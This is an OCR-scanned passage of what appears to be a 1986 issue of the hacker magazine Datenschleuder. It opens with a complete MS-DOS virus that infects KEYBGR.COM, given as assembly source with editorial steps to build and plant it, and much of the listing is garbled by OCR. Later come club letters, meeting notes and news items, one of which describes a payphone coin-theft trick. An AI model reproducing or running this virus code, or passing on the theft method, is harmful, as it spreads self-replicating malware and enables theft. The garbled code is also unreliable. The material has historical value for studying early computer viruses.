Ich entschloss mich daher, den folgenden Weg zu ge¬ 
hen: 

Der Virus setzt sich nur in einem bestimmten Pro¬ 
gramm fest, das vom Computer unbedingt benötigt 
wird, also im Betriebssystem oder in einem Teil da¬ 
von. Ich wählte den Tastaturtreiber KEYBGR.COM 
für diesen Zweck. Der Grund dafür war einfach, daß 
die meisten IBM-kompatiblen Rechner nicht mit PC¬ 
DOS 2.0, sondern mit dem (fast!) identischen MS- 
DOS 2.11 arbeiten. Dieses MS-DOS, bzw. dessen Ta¬ 
statur-Treiber, war für den Olivetti M24 vorgesehen, 
der im Vergleich zum IBM eine komplexere Tastatur 
besitzt. Läuft der Tastaturtreiber auf einem IBM, so 
ist das Vergeudung; der eigentlich benötigte Tastatur¬ 
treiber umfaßt nur 1543 Bytes, während der benutzte 
6549 Bytes lang ist. Ich bängte also an den IBM- 
Trciber einfach mein Virus-Programm und der Trei¬ 
ber war schon etwa 2000 Bytes lang — dann wurde er 
noch auf die ''benötigten”, d.h. unauffälligen 6549 
Bytes erweitert (hier könnte z.B. ein 4500 Zeichen 
langer Text über die Gefährlichkeit der Computervi¬ 
ren abgelegt werden) — und fertig ist der Virus. 

Der Virus sucht, wenn er im System ist, bei jedem 
vom Benutzer erzeugten Piatten/Diskettenzugriff im 
aktuellen Directory nach dem Tastaturtreiber. Die 
Unterscheidung in/iziert/sauber wird nach der Zeit 
der letzten Änderung des Files KEYBGR.COM ge¬ 
troffen. Das MS- DOS File hat eine gespeicherte Zeit 


von 9:00:03 (angezeigt im DIR wird 9:00 ) während 
das infizierte die Dateizeit von 9:00:00 hat. Somit ist 
eine Unterscheidung allein aus dem Directory-Ein¬ 
trag ohne langwierigen weiteren Disketlenzugriff 
möglich. 

Alles weiteren wichtigen Informationen geben die 
Kommentare im Quellcode. 



Ergänzungen der Redaktion zum Virusprograrnm: 


Der Virus muss nun noch assembliert, gelinkt und 
dann in ein COM- File gewandelt werden. Mittels 
eines geeigneten Monitors werden nacheinander der 
Virus und der Tastaturtreiber geladen und mit 6549 
Bytes als KEYBGR.COM zuriickgeschrieben. Gege¬ 
benenfalls muss der durch den Treiber übcrschricbe- 
ne Virusanfang restauriert werden, bevor das infizier¬ 
te File auf Disk geschrieben wird. Das sollte für einen 
geübten Assemblerprogrammierer kein Problem sein. 
Der vorliegende Virus zeichnet sich übrigens durch 
einige Besonderheiten aus, die ihn als besonders 
geeignet für die erste vollständige Veröffentlichung 
eines virussourcecodes erscheinen lassen: Er hat alle 
Eigenschaften eines Virus, ohne zerstörend zu wir¬ 
ken, wenngleich auch unbedarfte Anwender, die den 
Virus einfangen, an Hardwaredefekte denken mögen. 
Der Virus arbeitet im Verborgenen und wird nur dann 
aktiv, wenn ohnehin durch den Anwenderauf Disket¬ 
te/Platte zugegriffen wird, er fällt also nicht so leicht 
auf. Drittens kann man den Virus kontrollieren, weil 
er ja nur das Programm KEYBGR.COM befällt, und 
das auch nur, wenn dieses Programm mit der Uhrzeit 
09.00.03 im Directory steht. Dieser Umstand führte in 
der Redaktion zu argen Schwierigkeiten, denn für 
den als Versuchskaninchen ausgesuchten Rechner 
gab es zunächst kein KEYBGR.COM, welches den 
Ansprüchen des Virus genügt. Kurzum, es ist ein Vi¬ 
rus, der voll funktionsfähig ist, aber wohl kaum grös¬ 
sere Verbreitung finden dürfte. 

Die Virusaktivität besteht darin, daß bei jedem Ta¬ 
stendruck und ßilschirmausgabe eines Zeichens ein 
kurzes Rauschen (’Tchebehr) zu hören ist und der 
Benutzer an einen Hardwarefebler denken könnte. 


NAME VIRUS 

ABSO SC01ENT AT 0 
ORC 4*10K 

VIOEOINT OW 2 OOP (7) ; VIDEO INTERRUPT VECTOR 

ORG 4*21K 

DOSIWT OW 2 DUP (?» ; OOS 
ORC 4*24H 

ERRORIKT OM 2 OOP <7» ; ERROR --- 
A0SO ENOS 
CODE SEGMENT 

ASSUME CSiCODE, DSiCODE. ESiCOOE 

ORC OSCH 

rCB LABEL BYTE 

DRIVE DB 7 

PSPEC DB 11 DUP (' *) ; Fllenaine 

ORG SCH 

FS12E DH 2 DUP (?» 

PDATE DM ? ; Datun des letzten SchEftibKRA 
rriME DH ? f Zelt 
ORC 8OH 

DTA DV 126 DUP (?) : Disic 7r»naf£rätkii»a 
ORC 071CH ; Ende des 
XOR AX,AX 

MOV eS,AX ; ES telgt auf ABÄöiwww'' 

ASSUME ES:ABSO 
PÜSH CS 
POP OS 

MOV AX.VIOEOIMT SpeFöhRre air,' - , e* a- 

MOV BX,V1DE0INT»2 

MOV VIDEOVECTOR.AX 

MOV VlOeoVECTUH+Z^ax 

MOV AX.OOSIKT 

MOV ax,oosiMT*2 ^.4; 

MOV OOSVECTOR.AX ' .'SM: 

MOV DOSVECTOR*2,BX 

CLI 

MOV DOSINT.OFFSET VIRUS ; Neuer D 
VIRUS 

MOV DOSINT+2.CS 

MOV VIDEOINT,OrrSET DISEASE ; VH* 

DISEASE 

MOV V10E01NT*2,CS 
STI 

MOV AH,0 

INT IAH ; Lese TlmeOfDay (700) 

MOV TIMEO,OX 
LEA DX.VIRUSENDE 
INT 27H ; Prooranw Deenden, aber 
; resident bleiben. 

VIDEOVECTOR DH 2 DUP (?) 

DOSVECTOR OH 2 DÜP (?) 

ERRORVECTOR DM 2 00P(?) 

TIMEO DH ? 


«er Tfi; 


auf 




■A.., 


; VIRUS Hauptprogranntel1 : 

; 1. Systenaufruf AH*4BH 7 
; Nein : —' 2. 

; Schon infiziert 2 
; Ja : —' 3. 

t 

: 2. Sprung Ins normale 005 
/ 

Rhdval ob 'bfhg' 

ACTIVE OB 0 ; Nicht aktiv. 

PRCSCT DB 0 ? Allererster Virus rieht aktiv ! 

DB 'A;' 

FNAME PB 'AEYBCR CCM' 

DB 0 

VIRUS PRDC FAR 

ASSUME CSrCODE. DS:N0THIN6. EStNDTHlNG 
PUSH AX 
PÜSH CX 
PUSH DX 

MOV AH,0 ; Prvefe, ob mindestens 15 Min. 

INT IAH ; seit Initialisierung vergangen 
SUB DX,TIMEO 2 sind. 

CMP OX,16364 ; (U384 Ticks des Zeitgebers -15 Hin. 
JL S3 

MOV ACTIVE,! ; Falls ja, aktiviere Virus. 

S3; POP DX 
POP CX 
POP AX 

; Dlskettenzugrlf t 
i aufgrund des 

CMP AX,4B00H ; OOS Kocmiandos 

JE $1 ; "Prograjiini laden und ausfuehren* ? 

EXITl: JMP DOSVECTOR ,- Nein : —’ Normal weiter 
Sl: PUSH ES ; CS:BX —' Parameterblock 
PUSH BX ; OSiDX —' Dateiname 
PUSH OS ; Sichere Register, die noch 
; gebraucht 

PUSH DX : veeden fuer INT 21H (AH-4BH) 

MOV 01.DX 

MOV DRIVE,0 ; Setzen des Laufwerkes des 
MOV AL,DS:DI>1 ; auszufuehrenden ProQiaitanes 
CMP Al,':' 

JHE SS 
MOV Al,DS:DI 
SUB AL, 'A'-l 
MOV DRIVE,Al 
SS: CLD 
PUSK CS 
POP DS 
XOR AX,AX 
MOV ES,AX 

ASSUME DS;COD£, ESMBSO 

MOV AX,ERHORIwr ; Icnorleren aller Dlsketten- 


I -fahler“ 

MOV BX,ERR0R1NT*2 j durch olgonr! Kehlnrrout 1 no 

MOV ERRORVECTOR. AX 

MOV ERRORVECTOR*!,BX 

MOV ERRORINT.OFFSET ERROR 

MOV ERR0RINT*2,CS 

PUSH CS 

POP ES 

ASSUME ESiCODE 

LEA DX.DTA ; Disk Transfer Area anwaehlen 
MOV AH,IAH 
INT 21H 

MOV BX,11 : Uebertragen des Dateinamens 

$2; MOV AL.FNAME-IBX ; ln den FlleControlBlock 

MOV rSPEC-lBX,AL 

DEC BX 

JN2 $2 

LEA DX,FC3 ! oefCne Datei ( zum Schreiben ) 

MOV AH,OFH 
INT 21H 
CMP AL,Q 

JNE EXITO ; Datei existiert nicht —' Ende 
MOV AX.FTIME ,• Datei schon Infiziert 7 
CMP AX,40OOH 
JE EXITO ; Ja —' Ende 
MOV PRESET,! ; (Alle Kopl 
MOV SI.IOOH ; Schreibe de 
$4: LEA DI,DTA 
MOV CX,128 
REP MOVSB 
ISA DX,FCB 
MOV AH,15H 
INT 21H 

CMP SI,OFFSET VIRUSENDE 
JL 84 

MOV FSIZE,OFFSET VIRUSENDE - lOOH 

MOV PSIZC*2,0 ; Korrekte Dateigroesse setzen 

MOV FaATE,0AA3H ; Korrektes Datum (03.05.06) 

MOV FTIH£,4aOOH ; Korrekte Zeit ( 9:00:00) 

; setzen 

lEA DX,rCB ; Datei schllessen 

MOV AH.ICH 

•INT ZIH 

XOR A (,AX 

MC« * 1,AX 

E5:AB50 

H9ir AX,ERRORVECTOR ( Rueckaetzen des Fehler- 

7 ftPtarrupts 

%K,SRR0RVECT0R*2 

h0y.^SiRORINT,AX 

HQV.:eiliipRIMTt2,BX 

8 POP DX ; ftueeXhelen der gesicherten 
ter 


PO? nz' 


£S:K0TKINC 
(||i;i<fiHemale Fun)ctlflnsausfuflhrung 


3 ex 

3> la 


Wi»" ES 

.''ASSUMB DS:H_.„, 

MOV AX. 

JMP 

?3KEt^"|lnfach alle Fehler 

■ EMDP 
XiSi'JSSEASE PROC FAR 
HÜ-^ASSUME DSiNOTHINC, ESffipTHINC 

PUSH AX “ii., 

PUSH CX t Dlese,:{tirQlüiCmr:IVerden zerstoert 
TEST PRESET, 

JZ EXrT2 
TEST ACn^l- 

■ , %JÖ*::-.Afe:iMrP?|Mi'öt'iprecher .ainschalten 

( Bit 0 Ä- 0 > 

» schieiiüliadMÄr-,«': 

NOfSE! i , 

MOV AL, RHDVAL ; 

XOR AL,(Ufi«>AL+3 f 
SHL ALrX'/,-:,^f’«^i«S^^*@l^SCHEN 
5HL AL,r ft 

RCL »aSH StR RNDVAL»X P : 

RCL WC^;;:;jipfR RKOVAL*>^3j f : 

MOV l AusgÄ^ftftätnes bgü^falgen 

AND AKtiS^^aits des ri»E)tg«ltoppel.LBn 
IM AL, fiIÄ;?*i';'Schlebere<jiätte'i* 

AND AL.ORJiJifJv—* UuCjy««eiier rauscht ... 

OR AL.AH 
OUT 61H,At 
LOOP NOI5E '■ 

AND AL,0rCH 
OR AL, 1 
OUT 61H.AL 
EX1T2: POP CX 
POP \X 

JMP VIDEOVECTOR 

; springen . 

DISEASE ENDP 

DB 'Dieses Prograrna Ist ein sogenanntes VIRUS - Pro-' 

DB 'graan. Es hat, einmal aktiviert, die Kontrolle ueber' 
DB 'alle S/stemelnhelten und sogar ueber die vom' 

DB 'Benutzer eingelegten Spelcherungsmedlen. Es kopiert' 
DB 'sich salbstsCaendlg in noch nicht Infizierte Be' 

DB .'trlebssysteme und verbreitet sich so unkontrolliert.' 
DB 'Dae der Virus ln diesem Fall keine Benutzerprogranme' 
DB 'zerstoert oder Speichemedien loescht, ist nur ein' 

DB 'philantroplscher Zug des Authors.' 

ORG 1C2AH 

VIRUSENDE LABEL BYTE 
CODE ENDS 
END 

vfrvcil.äs fOxI2711861810 


ttAldUlplf'flolier ausschalten 


in die normale VIDEO - Rout Ine 


DatensclileuderS 


Datenschleuder 4 











Liebe Leute vom CCC, 

so Herbst/Endc letzten Jahres hatte ich bei euch ] 
Hackerbibel Teil I zu 33.33 und 64 Kleber „Achtung 
Abhörgefahr“ A4 bestellt. Daraufhin tat sich ne Wei¬ 
le gar nix und ich hatte die Bestellung eigentlich auch 
schon abgeschrieben, bis ihr plötzlich am 4.4.86 den 
damals beigefügten Scheck eingelöst habt. Seitdem 
ist aberauch nix mehr passiert. Es wäre ganz nett von 
euch, wenn ihr schon den Scheck einlöst und mein 
armes Konto überzieht, daß ihr mir auch was schickt, 
denn jetzt hätte ich auch echt wieder Lust auf das 
Buch. Wenn ihr die Kleber nicht mehr findet, packt 
halt ne andere nette Sache ’rein. Ok?? 

PS: Wißt ihr, was mich an euch nervt? Ihr seid so 
schweine-elilär. Muß doch echt nicht sein. Ist doch 
nichts dabei, aus ein paar ICs witzige Sachen zu 
bauen und was Feines, Subtiles mit zu machen. Da 
braucht man doch keine Avantgarde-Crew a la CCC. 
Sowas ist doch Scheiße und läuft unseren eigenen 
Zielen'zuwider] Auch der Personenkult a la Wau ist 
doch zum Kotzen! Lieber 1000 subtile DFÜ-Crews In 
der Nacht, als noch eine Elite mehr. 

Volker Ernst 


Die CCC-Fachgruppe Weltregierung meint dazu: 
Zum einen: Wir sind von Zeit zu Zeit schlicht über¬ 
forden, was das Erledigen von Bestellungen angeht. 
Einfach, weil es an Zeit und Leuten mangelt, die ver¬ 
antwortlich mitmachen. Im allgemeinen kriegen wir 
das aber zusammen mit den Bestellern in den Griff, 
ohne daß der Gerichtsvollzieher erscheinen muß. 
Don’t panic. Es läuft nicht ganz so glatt wie bei Quel¬ 
le, wofür wir um Nachsicht bitten und Besserung 
nicht versprechen können. In bestimmten Dingen ist 
der CCC aber trotzdem, so hoffen wir, die bessere 
Quelle. 

Lieber Volker, Du solltest uns wirklich mal besuchen 
kommen (z.B. zum Congress), wenn Du den Eindruck 
hast, daß wir ein elitärer Haufen sind. Heiterkeit wird 
in Dein Herz einkehren, wenn Du die Realität siehst. 
Der CCC Hamburg ähnelt weniger einer Elite, die 
sich ja auch durch straffes, diszipliniertes Funktio¬ 
nieren hervortun müßte, als vielmehr einem rechner¬ 
gestützten Flohzirkus. Dieser Flohzirkus zeigt rapide 
Auflösungserscheinungen, wenn mal wieder Brief¬ 
couverts zugeklebt werden müßten oder so, was u.a. 
zu den elastischen Lieferzeiten fuhrt. Und er erzeugt 
andererseits als eine Art Gruppendynamo auch jene 
wunderliche Art von (technischen und politischen) 
Geistesblitzen, die in den letzten Jahren überall dort 
aufleuchten, wo sich Leute trickreich, spielerisch und 
kritisch mit elektronischer Datenverärgerung und 
Kommunikation auscinandersetzen: Bicpiloten wie 
Du und ich. Das, was wir alle machen, könnte man 
”Arbyte” nennen. Rumdüsen im Informationszeital¬ 
ter. Eine Bordzeitung hältst Du gerade in der Hand. 


Mit welchen Absichten wir dieses kleine aber feine 
Käseblättchen hersteilen, und daß dies nicht zu unse¬ 
rer Privatbeölung geschieht, ist in dem Artikel «'The¬ 
ma Hacken“ ausführlicher beschrieben: siehe dort. 
Im übrigen: Willkommen an Bord. Captain Chaos 
begrüßt sie und wünscht einen angenehmen Flug 
nach Digilalien. Bitte abzuschnallen und das Rau¬ 
chen fortzusetzen, wir booten in Kürze. 

Und da wir grade bei Piloten sind, noch ein Wort zum 
vermeintlichen Personenkult. Der Vorwurf, daß 
einem etwa Wau (bekannt aus Funk und Fernsehen) 
dauernd aus der Zeitung cntgegcnlacht, trifft nicht 
Wau, sondern die Medien. Journalisten arbeiten mit 
Schubladisierungen, und seit dem Btx-Coup haben 
sie Wau in der Lade mit der Aufschrift „Computer & 
Aberwitz“. Dort sitzt er nun, bzw. jener Teil seiner 
Seele, der in der Medienlandschaft „Image“ heißt. 
Und wenn irgendwo wieder ein armes schwaches 
Elektronengehim in Ohnmacht gefallen ist, zieheri 
die Journalisten die Lade auf, zappklapp, und bei 
Wau beginnt das Telefon zu rauchen, so einfach ist 
das. Aus diesem Grund lassen sich beispielsweise 
Stammesangehörige der Massai (Ostafrika) nicht fo¬ 
tografieren (nicht wegen Wau, sondern wegen dem 
gefangenen Image). Dieser Effekt potenziert sich 
dann nach dem Motto „Leute versammeln sich dort, 
wo sich schon Leute versammelt haben“, d.h. durch 
die Berichterstattung kriegen nicht nur immer mehr 
Leser, sondern natürlich auch immer mehrToumali- 
sten Wau in die Lade. Grade für ein so inhomogenes 
Sortiment von Zeitgenossen wie es Computerfreaks 
darstellen, ist es doch von entscheidender Wichtig¬ 
keit, über Sprecher zu verfügen, die eine weit gestreu¬ 
te Aufmerksamkeit finden und das Kunststück zuwe¬ 
ge bringen, die gemeinsame Hackerphilosophie ak¬ 
tuell auf den Punkt zu bringen und gleichzeitig auf 
eine auch für Nichifreaks verständliche Weise EDV- 
kriiische Rauchsignale aus dem Maschinenland ab¬ 
zugeben. Das kann nicht jeder. Wer sich in der Me¬ 
dienpräsenz der Computersubkultur ein demokrati¬ 
sches Modell, etwa nach dem grünen Roiaiionsprin- 
zip, wünscht, dem muß man zu bedenken geben, daß 
ein soziokybcrnctischcs Infotop (langsam nochmal 
lesen) wie der CCC sich nicht wie ein Gesangsverein 
vor einer Fernsehkamera zusammenschieben läßt. 
Und nicht an Dich gerichtet, Volker, aber an jene, die 
vielleicht ein bißchen eifersüchtig auf das Wau-Ima¬ 
ge sind: Wer meint, daß es der reine Eitelkeitsgenuß 
ist, wenn man sich alle acht Wochen im SPIEGEL 
bewundern kann, der hat sich kräftig in den Finger 
geschnitten. Im öffentlichen Interesse zu stehen, zu¬ 
mal wenn es dabei bisweilen um Aktionen am Rande 
der Legalität geht, erweckt u.a, auch rasch die Auf¬ 
merksamkeit behördlicher Stellen, die einem fortan 
von Amts wegen ganz empfindlich im Privatleben 
henimrüsseln. 

Für den Großteil der Bevölkerung waren Hacken und 
Datenakrobatik vor noch nicht allzu langer Zeit ge¬ 
nauso obskure Angelegenheiten wie Flechtenkunde 
oder Ägyptologie. Von daher betrachtet war die Ha- 
Spa/Btx-Geschichte für uns alle sowas wie die spek ¬ 
takuläre Öffnung der Grabkammer des Tutencha- 
mun. Statt uns in Kleingeisterei zu zernörgeln, sollten 
wir die Goldmaske „Image“ pflegen, der es mit zu 
verdanken ist, daß wir unsere Grabungen in den do¬ 
tierten Siliziumplättchen fortführen können, ohne 
umgehend im Verließ zu landen. 


Datenschleuder6 


Nobody is Plusquamperfekt. Und grade wer sich ein¬ 
gehender mit Medien und Kommunikationstechno¬ 
logie befaßt, wird gut wissen, daß zwischen der Per¬ 
son Wau („Herr Wau aus Holland bitte zum Informa¬ 
tionsschalter“) und dem Image Wau ein wichtiger 
und vor allem wirklichkeitsmächtiger Unterschied 
besteht. In eine Bierkiste passen etwa acht SpaceS- 
huttles, und das World Trade Center ist zirka so hoch 
wie eine Packung Butterkeks: Das sind die Dimen¬ 
sionen der Wirklichkeit, wie sie beispielsweise das 
Fernsehen zeigt. 

Im übrigen sind wir dankbar für jeden, der uns bei 
der Ausübung unserer avantgardistischen und elitä¬ 
ren Beschäftigungen, nämlich bei den verlustreichen 
Gefechten im Papierkrieg, beim Kaffeekochen, Sor¬ 
tieren, Müllruntcrbringcn, Interviewsgcben und I- 
Million-kleine-Dinge-erledigen tatkräftig unterstützt. 
Lieber 1000 subtile Crews, die beim Eintüten helfen, 
als noch eine eingegangene Zeitung mehr. Und nun 
das Weiter. 

Ls blofeld 


Aie 

AaxevGx^s'uSep 

Mitgliederversammlung 

des CCC e.V. vom B. II. 1986 ■■■«i 


Die 1. ausserordentliche Mitgliederversammlung be¬ 
schloss am 8.11.86 zwei Punkte, die sich wesentlich 
für unsere Mitglieder auswirken werden: 

Zum ersten, die Änderung der Vereinssatzung. Durch 
die Ablehnung der Gemeinnützigkeit aufgrund der 
Beurteilung, daß „Hacken“ keinen gemeinnütziger 
Zweck im Sinne der Abgabenordnung darstelle, wur¬ 
de eine Umformulierung der Satzung nötig. 

Es wurde folgende Satzungsänderung beschlossen 
und zur Eintragung in das Vereinsregister einge¬ 
reicht: 

Der Paragraph 2, Absatz 1, Punkt 7, bisheriger Wort¬ 
laut 'Hacken’, wird gestrichen und durch die Formu¬ 
lierung 'Förderung des schöpferisch-kritischen Um¬ 
gangs mit Technologie’ ersetzt. 

Zum Zweiten der weitere Betrieb des Chaos Commu- 
nication Center: 

Der Vorstand des Clubs erläuterte die Situation des 
Chaos Communication Center auf dem INFEX-Sy- 
stem. Die dort gemieteten Kapazitäten werden der¬ 
zeit nur zu 30 Prozent genutzt. Der Zulauf ist erheb¬ 
lich geringer als erwartet. Die Mitgliederversamm¬ 
lung beschloss, die Clubarbeit auf die CLlNCH-Box 
zu verlagern, außerdem aber die Teilnahmemöglich¬ 
kelten auf dem Infex-System (soweit dies finanzier¬ 
bar ist) für interessierte Mitglieder weiterhin anzubie¬ 
ten. Zur praktischen Handhabung dieser Änderung 
siche Artikel „Wo ist der CCC?“ 

LS23 



THEMA HACKEN 


Ein Statement 


Der Chaos Computer Club gilt in der Öffentlichkeit 
als eine Art Robin Data, vergleichbar mit Greenpea¬ 
ce, Robin Wood und anderen. Spektakuläre 
Aktionen, wie beispielsweise der Btx-Coup, demon¬ 
strative Manipulationen mit Geldautomaten oder die 
jetzt anstehende Diskussion über Computer-Viren, 
werden als nachvollziehbare Demonstrationen über 
Hintergründe im Umgang mit der Technik verstan¬ 
den. DerCCChat damit eineaufkläreri-sche Rolle für 
den bewußten Umgang mit Datenmaschinen über¬ 
nommen. So schreibt Walter Volpert in seinem Buch 
„Zauberlehrlinge - die gefährliche Liebe zum Com¬ 
puter“, die „neuen Hacker“ seien interessant, weil sie 
als Computer-Enthusiasten den Mythos der unan¬ 
greifbaren Maschine zerstören können. Durch dieses 
Image in der Öffentlichkeit, hat sich der CCC in den 
letzten Jahren einen Freiraum erkämpft, in dem unter 
gewissen Voraussetzungen Hacks möglich sind, die 
Einzelpersonen in arge Schwierigkeiten bringen wür¬ 
den. 

Zunehmend versuchen nun Einzelne im CCC-Fahr- 
wasser mitzuschwimmen, indem sie ihre privaten Ak¬ 
tionen ohne Rücksprache mit dem Club als CCC-Ak- 
tion darstellen. Dies hat schon in der Vergangenheit 
eine Reihe von Problemen aufgeworfen. Inzwischen 
wird für fast jede Aktion in der Bundesrepublik eine 
Stellungnahme vom CCC erwartet, wobei der CCC 
über die Hintergründe der bekanntgewordenen Ak¬ 
tionen oftmals nicht informiert wurde. Gleichzeitig 
besteht wegen der gesellschaftlichen Aufgabe des 
CCC die Notwendigkeit, einer Kriminalisierung von 
Hackern entgegenzuwirken. Vor diesem Hintergrund 
kann der CCC ohne Rücksprache nur unter erschwer¬ 
ten Bedingungen Unterstützung leisten. Rücksprache 
heißt in dem Zusammenhang, daß rechtliche Konse¬ 
quenzen angesprochen werden sollten, um im Rah¬ 
men juristischer und journalistischer Möglichkeiten 
eine Kriminalisierung zu verhindern. Dazu sollte sich 
eine Gruppe zusammenfinden, die Kriterien entwic¬ 
kelt, die als Orieniierungshilfen gellen können. Diese 
Gruppe hätte unter anderem die Aufgabe, sich in die 
geltende Gesetzgebung einzuarbeiten, um kompetent 
argumentieren zu können. Darüber hinaus ist zu fra¬ 
gen, ob sich der CCC weiterhin als „Deutschlands 
Hackerzentrale“ mit Personenkult entwickeln kann 
— und vor allem — was die einzelnen Mitglieder tun 
können, um diese allgemein kritisierte Situation zu 
überwinden. 

jwi 


Datenschleuder? 











Strahlengefahr aus dem Telefon? 


In^der vergangenen Zeit häuften sich in der Redak¬ 
tion Anfragen von Personen, die ihren Fernsprecher 
zufällig im Radio empfangen können. 

Es sind nicht die typischen Filmszenen, in denen der 
Agent die Wanze durch Drehen am Radio entdeckt. 
Hier scheint es sich um ein serienmäßiges Merkmal 
der Postgeräte zu handeln. Wiederholt konnten Fern¬ 
sprecher mit eingebautem Gebührenzähler auf der 
Freuenz von 405 Khz (zwischen Mittel- und Langer- 
welle) im Radio empfangen werden. Es scheint, als 
ob die Gebührenzähler wie Sender wirken und, be¬ 
dingt durch Toleranzen der verwendeten Bauteile, 
mehr oder weniger weit zu empfangen sind. Manch¬ 
mal muß man das Telefon auf das Radio stellen, in 
anderen fällen empfängt man es im Auto-Radio. 
Bisher ist der Fernsprecher TAP 791*Gebanzl mehr¬ 
fach aufgcfallcn. Leser, die im Besitz eines Empfän¬ 
gers sowie eines Fernsprechers mit Gebührenzähler 
(vielleicht auch ohne) sind, sollten der Redaktion ihre 
Erfahrungen milteilen. Auf dem Congress wird dieses 
Thema im Rahmen eines Workshops über kompro¬ 
mittierende Abstrahlung behandelt. 

LS23 



Staatliches Wanzenmonopol 
eingerichtet 


P(^ weist auf AomeldetermiD aichtgeaehmigter 
Sendeaalageo h/o. 

Das seit dem 5. Juli 86 geltende „Gesetz zur Verhin¬ 
derung des Mißbrauchs von Sendeanlagen“ hat, laut 
Aussage der Post, den verstärkten Schutz der Intim- 
und Geheimsphärc der Bürger sowie des Femmeldc- 
verkehrszum Ziel. 

Dieses Gesetz macht bereits den Erwerb, den Besitz 
und das Überlassen einer Sendefunkanlage (Sender 
oderSender/Empßnger) von einer femmelderechtli- 
chen Genehmigung abhängig. Das Betreiben nicht- 
genehmigter Sendeanlagen, die im Einzelhandel an- 
geboten werden, war zwar auch vordem 5. Juli verbo¬ 
ten, der bloße Besitz hingegen gestattet. Die sich noch 
ira Besitz von Personen und Firmen befindlichen 
nicht zugelassenen Geräte, müssen bis spätestens 5. 
Januar den Funkstörmeßstellen der Fernmeldeämter 
gemeldet werden. 

Auch nach der Bestätigung (unbedingt abfordem!) 
der Besitzanzeige durch die Post dürfen die Geräte 
nicht mit einer Stromversorgung, also Netz oder Bat¬ 
terie, verbunden und in Betrieb genommen werden. 


Eine Besitzanzeige erübrigt sich, wenn derartige Sen¬ 
deanlagen vor dem 5. Januar 87 für dauernd (nicht 
mit wenigen Handgriffen wieder einselzbar) un¬ 
brauchbar gemacht oder einem Berechtigten überlas¬ 
sen werden. 

Nicht genug damit, daß man abgehört werden kann. 
Nach der neuen gesetzlichen Regelung muß man da¬ 
für möglicherweise auch noch Strafe bezahlen: Wird 
man ausspioniert, so werden einem dazu natürlich 
eine oder mehrere Wanzen (staatlich genehmigte 
nichlgenehmigie Sendeanlagen) in die Wohnung ge¬ 
setzt. Schon der Besitz derselben ist nun jedoch straf¬ 
bar. Man weiß zwar nichts von dem Besitz, aber Un¬ 
wissen schützt ja bekanntlich vor Strafe nicht. 

LS23 


MÜNZFERN- 
SPRECHERTRICKS 

Ein neuer Gauner-Trick macht der Bundespost zu 
schaffen, berichtete der SPIEGEL in der Nummer 47. 
Mil präparierten Fünf- Mark-Stücken plündern 
Münzdiebe öffentliche Fernsprecher. 

Der neueste Münztrick gehört nach Einschätzung 
von Posiexpenen zum bislang “cleversten und ein¬ 
träglichsten Trick“ von Gaunern, die sich auf Tele¬ 
fonzellen spezialisiert haben. 

„Der Trick ist so simpel wie erfolgreich: Ein Fünf- 
Mark-Sfück wird am Rand an zwei Stellen leicht ein- 
gekerbt und an einem Faden * bevorzugt reißfestes, 
aber feines Blumenband - gebunden. Die präparierte 
Münze wird dann wie gewöhnliches Geld in den 
Münzkanal geworfen, aber nach einer bestimmten 
Zahl von Zeniimeiern durch den Faden gestoppt, der 
zuvor hinter dem Geldschlitz festgedrücki wurde - 
vorzugsweise mit Kaugummi.“ Die Manipulation ist 
von aussen nur schwer erkennbar. Das Geldstück 
baumelt kurz vor der Lichtschranke, die jeden Gel¬ 
deinwurf registriert. Alle folgend eingeworfenen 
Fünfcr(maximal 10) bleiben.dort hängen und können 
durch lösen des Fadens abkassiert werden. 

Der nahezu als betrugssicher geltende Telephonau¬ 
tomat Typ 21 der bundesweit in 53 000 Fünf-Mark- 
Fernsprechern eingebaut ist, wird laut FTZ nicht in¬ 
nerhalb von zwei Jahren ersetzt werden können. Um 
den Münzdieben auf die Spur zu kommen, setzen 
Post und Polizei in etlichen Großstädten — mit mä¬ 
ßigem Erfolg — bereits Sondertrupps ein. 

Die Redaktion empfiehlt Datenreisenden, die in öf¬ 
fentlichen Fernsprechern derartige Manipulationen 
aufdecken, sofort den Störungsdienst der Post anzu¬ 
rufen. Dem dann anreisenden Stördienst ist die Ma¬ 
nipulation anzuzeigen, sowie der Geldbetrag als 
Fundsache/Eigeneinwurf quittieren zu las.sen. Sol¬ 
ches Vorgehen befreit vom Tatverdacht, der durch 
eventuelle Wahrnehmung des Fundes unterstellt 
werden könnte. Bei Komplikationen bittet die Redak¬ 
tion um Information. 

LS23 



Gummiertes Fest 


Wie in jedem Jahr laufen Weihnacht.swunschbriefe 
aus allen Teilen der Bundesrepublik in 2167 Him¬ 
melpforten ein. In einer Gemeinschaftsakiion des 
Postamtes, der Gemeinde Himmelpforten und des 
Weinachtsmanns werden alle eingehenden Sendun¬ 
gen mit einem Schreiben beantwortet. „Oh,Oh,Oh! 
Mir wird schon schwummerig, wenn ich die großen 
Stapel Wunschbriefe hinter mir sehe“, stöhnt dort der 
Weinachtsmann. Ohne die Hilfe der Erdenpost wür¬ 
den er und das Christkind verzweifeln. Zum Glück 
hat er tüchtige und fleißige Helfer. So bleibt ihm nur 
noch, die Briefmarken auf den Antworlbriefen mit 
einem (s. Abbildung) weihnachtlichen Stempel zu 
entwerten. 

LS23 



Grünliche Compulerstudie 


Erste Wöhlperiode abgeschlossen 


„Die Einführung der Computertechnik gestaltet sich 
für die Grünen im Bundestag so schwer wie für ande¬ 
re der Ausstieg aus der Atomindustrie. Für beide geht 
es an die Strukturen“, beginnt eine Studie über die 
„Computerisierung der Fraktion“ (PARLAKOM), 
die gemeinsam von CCC/APOC (Arbeitskreis politi¬ 
scher Computereinsatz) und deren Freundinnen als 
Hilfestellung auf dem Weg zu einer fundierten Post¬ 
politik erstellt wurde. 

„Hisrisch geht es seit Herrschafis Zeiten um die Kon¬ 
trolle des fortgeschrittensten Mediums. Politisch um 
informationeile Selbstbestimmung. Kulturell um die 
Entwicklung von Netzwerken, netzgemäßem Denken 
und Handeln. Wirtschaftlich muß eine dezentrale 
Netztechnologie entwickelt werden.“ 

Die endgültige Genehmigung zur Veröffentlichung 
der Studie von gut 50 Seiten Umfang wird derzeit von 
der Bundestagsverwaltung bearbeitet. Der Verkauf¬ 
spreis wird zwischen DM 6,66 und 7,50 liegen. Ask 
Your Local Dealer eise CCC. Gosub Next Artikel. 

Is5 



Neue Gebühren 



Datex-Pwird teuer 


„Der Verwallungsrat der Deutschen Bundespost hat 
der von Rostminister Schwarz-Schilling vorgelcgten 
29. Verordnung zur Änderung der Fernmeldeord¬ 
nung zugestimmt. Diese Verordnung enthält neben 
Gebührensenkungen von im Saldo 330 Millionen 
